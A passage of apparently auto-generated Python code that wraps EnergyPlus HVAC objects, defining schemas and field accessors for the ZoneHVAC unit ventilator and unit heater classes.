| humidity is above humidistat setpoint. If YES is selected, outdoor air flow
| rate is modified any time indoor relative humidity is above the humidistat
| setpoint AND the outdoor humidity ratio is less than the indoor humidity ratio.
| Default value: Yes
Args:
value (str): value for IDD Field `Control High Indoor Humidity Based on Outdoor Humidity Ratio`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `control_high_indoor_humidity_based_on_outdoor_humidity_ratio` or None if not set
"""
return self[
"Control High Indoor Humidity Based on Outdoor Humidity Ratio"]
@control_high_indoor_humidity_based_on_outdoor_humidity_ratio.setter
def control_high_indoor_humidity_based_on_outdoor_humidity_ratio(
self,
value="Yes"):
"""Corresponds to IDD field `Control High Indoor Humidity Based on
Outdoor Humidity Ratio`"""
self[
"Control High Indoor Humidity Based on Outdoor Humidity Ratio"] = value
class ZoneHvacUnitVentilator(DataObject):
""" Corresponds to IDD object `ZoneHVAC:UnitVentilator`
Unit ventilator. Forced-convection ventilation unit with supply fan (constant-volume
or variable-volume), optional chilled water cooling coil, optional heating coil
(gas, electric, hot water, or steam) and controllable outdoor air mixer.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': 'alpha'}),
(u'availability schedule name',
{'name': u'Availability Schedule Name',
'pyname': u'availability_schedule_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'maximum supply air flow rate',
{'name': u'Maximum Supply Air Flow Rate',
'pyname': u'maximum_supply_air_flow_rate',
'minimum>': 0.0,
'required-field': True,
'autosizable': True,
'autocalculatable': False,
'type': 'real',
'unit': u'm3/s'}),
(u'outdoor air control type',
{'name': u'Outdoor Air Control Type',
'pyname': u'outdoor_air_control_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'FixedAmount',
u'VariablePercent',
u'FixedTemperature'],
'autocalculatable': False,
'type': 'alpha'}),
(u'minimum outdoor air flow rate',
{'name': u'Minimum Outdoor Air Flow Rate',
'pyname': u'minimum_outdoor_air_flow_rate',
'required-field': True,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm3/s'}),
(u'minimum outdoor air schedule name',
{'name': u'Minimum Outdoor Air Schedule Name',
'pyname': u'minimum_outdoor_air_schedule_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'maximum outdoor air flow rate',
{'name': u'Maximum Outdoor Air Flow Rate',
'pyname': u'maximum_outdoor_air_flow_rate',
'required-field': True,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm3/s'}),
(u'maximum outdoor air fraction or temperature schedule name',
{'name': u'Maximum Outdoor Air Fraction or Temperature Schedule Name',
'pyname': u'maximum_outdoor_air_fraction_or_temperature_schedule_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'air inlet node name',
{'name': u'Air Inlet Node Name',
'pyname': u'air_inlet_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'air outlet node name',
{'name': u'Air Outlet Node Name',
'pyname': u'air_outlet_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'outdoor air node name',
{'name': u'Outdoor Air Node Name',
'pyname': u'outdoor_air_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'exhaust air node name',
{'name': u'Exhaust Air Node Name',
'pyname': u'exhaust_air_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'mixed air node name',
{'name': u'Mixed Air Node Name',
'pyname': u'mixed_air_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'supply air fan object type',
{'name': u'Supply Air Fan Object Type',
'pyname': u'supply_air_fan_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Fan:OnOff',
u'Fan:ConstantVolume',
u'Fan:VariableVolume'],
'autocalculatable': False,
'type': 'alpha'}),
(u'supply air fan name',
{'name': u'Supply Air Fan Name',
'pyname': u'supply_air_fan_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'coil option',
{'name': u'Coil Option',
'pyname': u'coil_option',
'required-field': True,
'autosizable': False,
'accepted-values': [u'None',
u'Heating',
u'Cooling',
u'HeatingAndCooling'],
'autocalculatable': False,
'type': 'alpha'}),
(u'supply air fan operating mode schedule name',
{'name': u'Supply Air Fan Operating Mode Schedule Name',
'pyname': u'supply_air_fan_operating_mode_schedule_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'heating coil object type',
{'name': u'Heating Coil Object Type',
'pyname': u'heating_coil_object_type',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Coil:Heating:Water',
u'Coil:Heating:Electric',
u'Coil:Heating:Gas',
u'Coil:Heating:Steam'],
'autocalculatable': False,
'type': 'alpha'}),
(u'heating coil name',
{'name': u'Heating Coil Name',
'pyname': u'heating_coil_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'heating convergence tolerance',
{'name': u'Heating Convergence Tolerance',
'pyname': u'heating_convergence_tolerance',
'default': 0.001,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real'}),
(u'cooling coil object type',
{'name': u'Cooling Coil Object Type',
'pyname': u'cooling_coil_object_type',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Coil:Cooling:Water',
u'Coil:Cooling:Water:DetailedGeometry',
u'CoilSystem:Cooling:Water:HeatExchangerAssisted'],
'autocalculatable': False,
'type': 'alpha'}),
(u'cooling coil name',
{'name': u'Cooling Coil Name',
'pyname': u'cooling_coil_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'cooling convergence tolerance',
{'name': u'Cooling Convergence Tolerance',
'pyname': u'cooling_convergence_tolerance',
'default': 0.001,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real'}),
(u'availability manager list name',
{'name': u'Availability Manager List Name',
'pyname': u'availability_manager_list_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'design specification zonehvac sizing object name',
{'name': u'Design Specification ZoneHVAC Sizing Object Name',
'pyname': u'design_specification_zonehvac_sizing_object_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'})]),
'format': None,
'group': u'Zone HVAC Forced Air Units',
'min-fields': 16,
'name': u'ZoneHVAC:UnitVentilator',
'pyname': u'ZoneHvacUnitVentilator',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def availability_schedule_name(self):
"""field `Availability Schedule Name`
| Availability schedule name for this system. Schedule value > 0 means the system is available.
| If this field is blank, the system is always available.
Args:
value (str): value for IDD Field `Availability Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `availability_schedule_name` or None if not set
"""
return self["Availability Schedule Name"]
@availability_schedule_name.setter
def availability_schedule_name(self, value=None):
"""Corresponds to IDD field `Availability Schedule Name`"""
self["Availability Schedule Name"] = value
@property
def maximum_supply_air_flow_rate(self):
"""field `Maximum Supply Air Flow Rate`
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `Maximum Supply Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `maximum_supply_air_flow_rate` or None if not set
"""
return self["Maximum Supply Air Flow Rate"]
@maximum_supply_air_flow_rate.setter
def maximum_supply_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Maximum Supply Air Flow Rate`"""
self["Maximum Supply Air Flow Rate"] = value
@property
def outdoor_air_control_type(self):
"""field `Outdoor Air Control Type`
Args:
value (str): value for IDD Field `Outdoor Air Control Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outdoor_air_control_type` or None if not set
"""
return self["Outdoor Air Control Type"]
@outdoor_air_control_type.setter
def outdoor_air_control_type(self, value=None):
"""Corresponds to IDD field `Outdoor Air Control Type`"""
self["Outdoor Air Control Type"] = value
@property
def minimum_outdoor_air_flow_rate(self):
"""field `Minimum Outdoor Air Flow Rate`
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `Minimum Outdoor Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `minimum_outdoor_air_flow_rate` or None if not set
"""
return self["Minimum Outdoor Air Flow Rate"]
@minimum_outdoor_air_flow_rate.setter
def minimum_outdoor_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Minimum Outdoor Air Flow Rate`"""
self["Minimum Outdoor Air Flow Rate"] = value
@property
def minimum_outdoor_air_schedule_name(self):
"""field `Minimum Outdoor Air Schedule Name`
| schedule values multiply the minimum outdoor air flow rate
Args:
value (str): value for IDD Field `Minimum Outdoor Air Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `minimum_outdoor_air_schedule_name` or None if not set
"""
return self["Minimum Outdoor Air Schedule Name"]
@minimum_outdoor_air_schedule_name.setter
def minimum_outdoor_air_schedule_name(self, value=None):
"""Corresponds to IDD field `Minimum Outdoor Air Schedule Name`"""
self["Minimum Outdoor Air Schedule Name"] = value
@property
def maximum_outdoor_air_flow_rate(self):
"""field `Maximum Outdoor Air Flow Rate`
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `Maximum Outdoor Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `maximum_outdoor_air_flow_rate` or None if not set
"""
return self["Maximum Outdoor Air Flow Rate"]
@maximum_outdoor_air_flow_rate.setter
def maximum_outdoor_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Maximum Outdoor Air Flow Rate`"""
self["Maximum Outdoor Air Flow Rate"] = value
@property
def maximum_outdoor_air_fraction_or_temperature_schedule_name(self):
"""field `Maximum Outdoor Air Fraction or Temperature Schedule Name`
| that this depends on the control type as to whether it is a fraction or temperature
Args:
value (str): value for IDD Field `Maximum Outdoor Air Fraction or Temperature Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `maximum_outdoor_air_fraction_or_temperature_schedule_name` or None if not set
"""
return self[
"Maximum Outdoor Air Fraction or Temperature Schedule Name"]
@maximum_outdoor_air_fraction_or_temperature_schedule_name.setter
def maximum_outdoor_air_fraction_or_temperature_schedule_name(
self,
value=None):
"""Corresponds to IDD field `Maximum Outdoor Air Fraction or
Temperature Schedule Name`"""
self[
"Maximum Outdoor Air Fraction or Temperature Schedule Name"] = value
@property
def air_inlet_node_name(self):
"""field `Air Inlet Node Name`
Args:
value (str): value for IDD Field `Air Inlet Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `air_inlet_node_name` or None if not set
"""
return self["Air Inlet Node Name"]
@air_inlet_node_name.setter
def air_inlet_node_name(self, value=None):
"""Corresponds to IDD field `Air Inlet Node Name`"""
self["Air Inlet Node Name"] = value
@property
def air_outlet_node_name(self):
"""field `Air Outlet Node Name`
Args:
value (str): value for IDD Field `Air Outlet Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `air_outlet_node_name` or None if not set
"""
return self["Air Outlet Node Name"]
@air_outlet_node_name.setter
def air_outlet_node_name(self, value=None):
"""Corresponds to IDD field `Air Outlet Node Name`"""
self["Air Outlet Node Name"] = value
@property
def outdoor_air_node_name(self):
"""field `Outdoor Air Node Name`
Args:
value (str): value for IDD Field `Outdoor Air Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outdoor_air_node_name` or None if not set
"""
return self["Outdoor Air Node Name"]
@outdoor_air_node_name.setter
def outdoor_air_node_name(self, value=None):
"""Corresponds to IDD field `Outdoor Air Node Name`"""
self["Outdoor Air Node Name"] = value
@property
def exhaust_air_node_name(self):
"""field `Exhaust Air Node Name`
Args:
value (str): value for IDD Field `Exhaust Air Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `exhaust_air_node_name` or None if not set
"""
return self["Exhaust Air Node Name"]
@exhaust_air_node_name.setter
def exhaust_air_node_name(self, value=None):
"""Corresponds to IDD field `Exhaust Air Node Name`"""
self["Exhaust Air Node Name"] = value
@property
def mixed_air_node_name(self):
"""field `Mixed Air Node Name`
| inlet to coils
Args:
value (str): value for IDD Field `Mixed Air Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `mixed_air_node_name` or None if not set
"""
return self["Mixed Air Node Name"]
@mixed_air_node_name.setter
def mixed_air_node_name(self, value=None):
"""Corresponds to IDD field `Mixed Air Node Name`"""
self["Mixed Air Node Name"] = value
@property
def supply_air_fan_object_type(self):
"""field `Supply Air Fan Object Type`
| Allowable fan types are Fan:ConstantVolume, Fan:OnOff and
| Fan:VariableVolume
Args:
value (str): value for IDD Field `Supply Air Fan Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supply_air_fan_object_type` or None if not set
"""
return self["Supply Air Fan Object Type"]
@supply_air_fan_object_type.setter
def supply_air_fan_object_type(self, value=None):
"""Corresponds to IDD field `Supply Air Fan Object Type`"""
self["Supply Air Fan Object Type"] = value
@property
def supply_air_fan_name(self):
"""field `Supply Air Fan Name`
Args:
value (str): value for IDD Field `Supply Air Fan Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supply_air_fan_name` or None if not set
"""
return self["Supply Air Fan Name"]
@supply_air_fan_name.setter
def supply_air_fan_name(self, value=None):
"""Corresponds to IDD field `Supply Air Fan Name`"""
self["Supply Air Fan Name"] = value
@property
def coil_option(self):
"""field `Coil Option`
Args:
value (str): value for IDD Field `Coil Option`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `coil_option` or None if not set
"""
return self["Coil Option"]
@coil_option.setter
def coil_option(self, value=None):
"""Corresponds to IDD field `Coil Option`"""
self["Coil Option"] = value
@property
def supply_air_fan_operating_mode_schedule_name(self):
"""field `Supply Air Fan Operating Mode Schedule Name`
| Enter the name of a schedule that controls fan operation. Schedule
| name values of 0 denote cycling fan operation (fan cycles with
| cooling/heating coil). Schedule values greater than 0 denote
| constant fan operation (fan runs continually regardless of coil
| operation). The fan operating mode defaults to cycling fan operation
| if this input field is left blank.
Args:
value (str): value for IDD Field `Supply Air Fan Operating Mode Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supply_air_fan_operating_mode_schedule_name` or None if not set
"""
return self["Supply Air Fan Operating Mode Schedule Name"]
@supply_air_fan_operating_mode_schedule_name.setter
def supply_air_fan_operating_mode_schedule_name(self, value=None):
"""Corresponds to IDD field `Supply Air Fan Operating Mode Schedule
Name`"""
self["Supply Air Fan Operating Mode Schedule Name"] = value
@property
def heating_coil_object_type(self):
"""field `Heating Coil Object Type`
Args:
value (str): value for IDD Field `Heating Coil Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `heating_coil_object_type` or None if not set
"""
return self["Heating Coil Object Type"]
@heating_coil_object_type.setter
def heating_coil_object_type(self, value=None):
"""Corresponds to IDD field `Heating Coil Object Type`"""
self["Heating Coil Object Type"] = value
@property
def heating_coil_name(self):
"""field `Heating Coil Name`
Args:
value (str): value for IDD Field `Heating Coil Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `heating_coil_name` or None if not set
"""
return self["Heating Coil Name"]
@heating_coil_name.setter
def heating_coil_name(self, value=None):
"""Corresponds to IDD field `Heating Coil Name`"""
self["Heating Coil Name"] = value
@property
def heating_convergence_tolerance(self):
"""field `Heating Convergence Tolerance`
| Default value: 0.001
Args:
value (float): value for IDD Field `Heating Convergence Tolerance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `heating_convergence_tolerance` or None if not set
"""
return self["Heating Convergence Tolerance"]
@heating_convergence_tolerance.setter
def heating_convergence_tolerance(self, value=0.001):
"""Corresponds to IDD field `Heating Convergence Tolerance`"""
self["Heating Convergence Tolerance"] = value
@property
def cooling_coil_object_type(self):
"""field `Cooling Coil Object Type`
Args:
value (str): value for IDD Field `Cooling Coil Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `cooling_coil_object_type` or None if not set
"""
return self["Cooling Coil Object Type"]
@cooling_coil_object_type.setter
def cooling_coil_object_type(self, value=None):
"""Corresponds to IDD field `Cooling Coil Object Type`"""
self["Cooling Coil Object Type"] = value
@property
def cooling_coil_name(self):
"""field `Cooling Coil Name`
Args:
value (str): value for IDD Field `Cooling Coil Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `cooling_coil_name` or None if not set
"""
return self["Cooling Coil Name"]
@cooling_coil_name.setter
def cooling_coil_name(self, value=None):
"""Corresponds to IDD field `Cooling Coil Name`"""
self["Cooling Coil Name"] = value
@property
def cooling_convergence_tolerance(self):
"""field `Cooling Convergence Tolerance`
| Default value: 0.001
Args:
value (float): value for IDD Field `Cooling Convergence Tolerance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `cooling_convergence_tolerance` or None if not set
"""
return self["Cooling Convergence Tolerance"]
@cooling_convergence_tolerance.setter
def cooling_convergence_tolerance(self, value=0.001):
"""Corresponds to IDD field `Cooling Convergence Tolerance`"""
self["Cooling Convergence Tolerance"] = value
@property
def availability_manager_list_name(self):
"""field `Availability Manager List Name`
| Enter the name of an AvailabilityManagerAssignmentList object.
Args:
value (str): value for IDD Field `Availability Manager List Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `availability_manager_list_name` or None if not set
"""
return self["Availability Manager List Name"]
@availability_manager_list_name.setter
def availability_manager_list_name(self, value=None):
"""Corresponds to IDD field `Availability Manager List Name`"""
self["Availability Manager List Name"] = value
@property
def design_specification_zonehvac_sizing_object_name(self):
"""field `Design Specification ZoneHVAC Sizing Object Name`
| Enter the name of a DesignSpecificationZoneHVACSizing object.
Args:
value (str): value for IDD Field `Design Specification ZoneHVAC Sizing Object Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `design_specification_zonehvac_sizing_object_name` or None if not set
"""
return self["Design Specification ZoneHVAC Sizing Object Name"]
@design_specification_zonehvac_sizing_object_name.setter
def design_specification_zonehvac_sizing_object_name(self, value=None):
"""Corresponds to IDD field `Design Specification ZoneHVAC Sizing
Object Name`"""
self["Design Specification ZoneHVAC Sizing Object Name"] = value
class ZoneHvacUnitHeater(DataObject):
""" Corresponds to IDD object `ZoneHVAC:UnitHeater`
Unit heater. Forced-convection heating-only unit with supply fan, heating coil
(gas, electric, hot water, or steam) and fixed-position outdoor air mixer.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': 'alpha'}),
(u'availability schedule name',
{'name': u'Availability Schedule Name',
'pyname': u'availability_schedule_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'air inlet node name',
{'name': u'Air Inlet Node Name',
'pyname': u'air_inlet_node_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'air outlet node name',
{'name': u'Air Outlet Node Name',
'pyname': u'air_outlet_node_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'supply air fan object type',
{'name': u'Supply Air Fan Object Type',
'pyname': u'supply_air_fan_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Fan:OnOff',
u'Fan:ConstantVolume',
u'Fan:VariableVolume'],
'autocalculatable': False,
'type': 'alpha'}),
(u'supply air fan name',
{'name': u'Supply Air Fan Name',
'pyname': u'supply_air_fan_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'maximum supply air flow rate',
{'name': u'Maximum Supply Air Flow Rate',
'pyname': u'maximum_supply_air_flow_rate',
'minimum>': 0.0,
'required-field': True,
'autosizable': True,
'autocalculatable': False,
'type': 'real',
'unit': u'm3/s'}),
(u'heating coil object type',
{'name': u'Heating Coil Object Type',
'pyname': u'heating_coil_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Coil:Heating:Water',
u'Coil:Heating:Electric',
u'Coil:Heating:Gas',
u'Coil:Heating:Steam'],
'autocalculatable': False,
'type': 'alpha'}),
(u'heating coil name',
{'name': u'Heating Coil Name',
'pyname': u'heating_coil_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'supply air fan operating mode schedule name',
{'name': u'Supply Air Fan Operating Mode Schedule Name',
'pyname': u'supply_air_fan_operating_mode_schedule_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'supply air fan operation during no heating',
{'name': u'Supply Air Fan Operation During No Heating',
'pyname': u'supply_air_fan_operation_during_no_heating',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Yes',
u'No'],
'autocalculatable': False,
'type': 'alpha'}),
(u'maximum hot water or steam flow rate',
{'name': u'Maximum Hot Water or Steam Flow Rate',
'pyname': u'maximum_hot_water_or_steam_flow_rate',
'minimum>': 0.0,
'required-field': False,
'autosizable': True,
'autocalculatable': False,
'type': 'real',
'unit': u'm3/s'}),
(u'minimum hot water or steam flow rate',
{'name': u'Minimum Hot Water or Steam Flow Rate',
'pyname': u'minimum_hot_water_or_steam_flow_rate',
'default': 0.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm3/s'}),
(u'heating convergence tolerance',
{'name': u'Heating Convergence Tolerance',
'pyname': u'heating_convergence_tolerance',
'default': 0.001,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real'}),
(u'availability manager list name',
{'name': u'Availability Manager List Name',
'pyname': u'availability_manager_list_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'design specification zonehvac sizing object name',
{'name': u'Design Specification ZoneHVAC Sizing Object Name',
'pyname': u'design_specification_zonehvac_sizing_object_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'})]),
'format': None,
'group': u'Zone HVAC Forced Air Units',
'min-fields': 11,
'name': u'ZoneHVAC:UnitHeater',
'pyname': u'ZoneHvacUnitHeater',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def availability_schedule_name(self):
"""field `Availability Schedule Name`
| Availability schedule name for this system. Schedule value > 0 means the system is available.
| If this field is blank, the system is always available.
Args:
value (str): value for IDD Field `Availability Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `availability_schedule_name` or None if not set
"""
return self["Availability Schedule Name"]
@availability_schedule_name.setter
def availability_schedule_name(self, value=None):
"""Corresponds to IDD field `Availability Schedule Name`"""
self["Availability Schedule Name"] = value
@property
def air_inlet_node_name(self):
"""field `Air Inlet Node Name`
Args:
value (str): value for IDD Field `Air Inlet Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `air_inlet_node_name` or None if not set
"""
return self["Air Inlet Node Name"]
@air_inlet_node_name.setter
def air_inlet_node_name(self, value=None):
"""Corresponds to IDD field `Air Inlet Node Name`"""
self["Air Inlet Node Name"] = value
@property
def air_outlet_node_name(self):
"""field `Air Outlet Node Name`
Args:
value (str): value for IDD Field `Air Outlet Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `air_outlet_node_name` or None if not set
"""
return self["Air Outlet Node Name"]
@air_outlet_node_name.setter
def air_outlet_node_name(self, value=None):
"""Corresponds to IDD field `Air Outlet Node Name`"""
self["Air Outlet Node Name"] = value
@property
def supply_air_fan_object_type(self):
"""field `Supply Air Fan Object Type`
| Allowable fan types are Fan:ConstantVolume, Fan:OnOff and
| Fan:VariableVolume
Args:
value (str): value for IDD Field `Supply Air Fan Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supply_air_fan_object_type` or None if not set
"""
return self["Supply Air Fan Object Type"]
@supply_air_fan_object_type.setter
def supply_air_fan_object_type(self, value=None):
"""Corresponds to IDD field `Supply Air Fan Object Type`"""
self["Supply Air Fan Object Type"] = value
@property
def supply_air_fan_name(self):
"""field `Supply Air Fan Name`
Args:
value (str): value for IDD Field `Supply Air Fan Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supply_air_fan_name` or None if not set
"""
return self["Supply Air Fan Name"]
@supply_air_fan_name.setter
def supply_air_fan_name(self, value=None):
"""Corresponds to IDD field `Supply Air Fan Name`"""
self["Supply Air Fan Name"] = value
@property
def maximum_supply_air_flow_rate(self):
"""field `Maximum Supply Air Flow Rate`
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `Maximum Supply Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `maximum_supply_air_flow_rate` or None if not set
"""
return self["Maximum Supply Air Flow Rate"]
@maximum_supply_air_flow_rate.setter
def maximum_supply_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Maximum Supply Air Flow Rate`"""
self["Maximum Supply Air Flow Rate"] = value
@property
def heating_coil_object_type(self):
"""field `Heating Coil Object Type`
Args:
value (str): value for IDD Field `Heating Coil Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `heating_coil_object_type` or None if not set
"""
return self["Heating Coil Object Type"]
@heating_coil_object_type.setter
def heating_coil_object_type(self, value=None):
"""Corresponds to IDD field `Heating Coil Object Type`"""
self["Heating Coil Object Type"] = value
@property
def heating_coil_name(self):
"""field `Heating Coil Name`
Args:
value (str): value for IDD Field `Heating Coil Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `heating_coil_name` or None if not set
"""
return self["Heating Coil Name"]
@heating_coil_name.setter
def heating_coil_name(self, value=None):
"""Corresponds to IDD field `Heating Coil Name`"""
self["Heating Coil Name"] = value
@property
def supply_air_fan_operating_mode_schedule_name(self):
"""field `Supply Air Fan Operating Mode Schedule Name`
| Enter the name of a schedule that controls fan operation. Schedule
| name values of 0 denote cycling fan operation (fan cycles with the
| heating coil). Schedule values greater than 0 denote constant fan
| operation (fan runs continually regardless of coil operation).
| The fan operating mode defaults to cycling fan operation if this
| input field is left blank.
Args:
value (str): value for IDD Field `Supply Air Fan Operating Mode Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supply_air_fan_operating_mode_schedule_name` or None if not set
"""
return self["Supply Air Fan Operating Mode Schedule Name"]
@supply_air_fan_operating_mode_schedule_name.setter
def supply_air_fan_operating_mode_schedule_name(self, value=None):
"""Corresponds to IDD field `Supply Air Fan Operating Mode Schedule
Name`"""
self["Supply Air Fan Operating Mode Schedule Name"] = value
@property
def supply_air_fan_operation_during_no_heating(self):
"""field `Supply Air Fan Operation During No Heating`
| This choice field allows the user to define how the unit heater will operate
| under "no heating load" or cooling conditions. If the "No" is selected, then
| the fan will not run unless there is a heating load. If the fan does not run,
| this effectively shuts the unit heater system off when there is no heating load.
| If the "Yes" is selected, the unit heater is available and has a ConstantVolume
| fan, or has an OnOff fan with "Supply Air Fan Operating Mode Schedule" value
| greater than zero, then the fan will always run regardless of the zone load.
Args:
value (str): value for IDD Field `Supply Air Fan Operation During No Heating`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supply_air_fan_operation_during_no_heating` or None if not set
"""
return self["Supply Air Fan Operation During No Heating"]
@supply_air_fan_operation_during_no_heating.setter
def supply_air_fan_operation_during_no_heating(self, value=None):
"""Corresponds to IDD field `Supply Air Fan Operation During No
Heating`"""
self["Supply Air Fan Operation During No Heating"] = value
@property
def maximum_hot_water_or_steam_flow_rate(self):
"""field `Maximum Hot Water or Steam Flow Rate`
| Not used when heating coil is gas or electric
| Units: m3/s
| IP-Units: gal/min
Args:
value (float or "Autosize"): value for IDD Field `Maximum Hot Water or Steam Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `maximum_hot_water_or_steam_flow_rate` or None if not set
"""
return self["Maximum Hot Water or Steam Flow Rate"]
@maximum_hot_water_or_steam_flow_rate.setter
def maximum_hot_water_or_steam_flow_rate(self, value=None):
"""Corresponds to IDD field `Maximum Hot Water or Steam Flow Rate`"""
self["Maximum Hot Water or Steam Flow Rate"] = value
@property
def minimum_hot_water_or_steam_flow_rate(self):
"""field `Minimum Hot Water or Steam Flow Rate`
| Not used when heating coil is gas or electric
| Units: m3/s
| IP-Units: gal/min
Args:
value (float): value for IDD Field `Minimum Hot Water or Steam Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `minimum_hot_water_or_steam_flow_rate` or None if not set
"""
return self["Minimum Hot Water or Steam Flow Rate"]
@minimum_hot_water_or_steam_flow_rate.setter
def minimum_hot_water_or_steam_flow_rate(self, value=None):
"""Corresponds to IDD field `Minimum Hot Water or Steam Flow Rate`"""
self["Minimum Hot Water or Steam Flow Rate"] = value
@property
def heating_convergence_tolerance(self):
"""field `Heating Convergence Tolerance`
| Default value: 0.001
Args:
value (float): value for IDD Field `Heating Convergence Tolerance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `heating_convergence_tolerance` or None if not set
"""
return self["Heating Convergence Tolerance"]
